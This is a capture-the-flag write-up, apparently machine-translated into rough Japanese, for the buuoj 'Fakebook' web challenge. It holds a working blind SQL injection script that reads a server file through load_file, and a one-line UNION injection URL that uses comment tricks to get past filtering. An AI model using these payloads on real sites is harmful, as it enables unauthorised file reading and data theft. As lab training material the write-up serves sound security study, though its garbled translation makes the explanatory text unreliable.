ブラシのタイトルレコード:[ネットワーク三脚カップ] Fakebook

ブラシのタイトルレコード:[ネットワーク三脚カップ] Fakebook

経常トピックリンク:https://buuoj.cn/challenges
参考リンク:ウェブネットワーク三脚カップのタイトルのためのソリューション(fakebook)

一つは、関係する知識のポイント

1、機密文書の開示

robots.txtのは、アドレス、バックアップのソースコードへのアクセスを得ることができます

2、SQLインジェクション

従来の射出、言うことはありません。

第二に、問題解決のアプローチ

この質問は比較的簡単ですが、私はタイトルをフィルタリングしませんでした、予想外のソリューションによって作られたload_fileスクリプトを貼り付け、盲目の注入点アウトnoteから直接取得することができ、

import requests

url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
result = ''

for x in range(0, 100):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
        response = requests.get(url + payload)
        if 'www.123.com' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    result += chr(int(mid))
    print(result)

溶液はWPを読むことが予想され、我々はソースコードの開示、そして最終的に抗シリアライズを使用して、ファイルとファイルのプロトコルを読むSSRFがある知っています。
愚かなそれを考えるために直接アクセス/view.php?no=0+unIon/**/select+1,load_file('/var/www/html/flag.php'),1,1あなたはフラグを得ることができます

おすすめ

転載: www.cnblogs.com/20175211lyz/p/11469695.html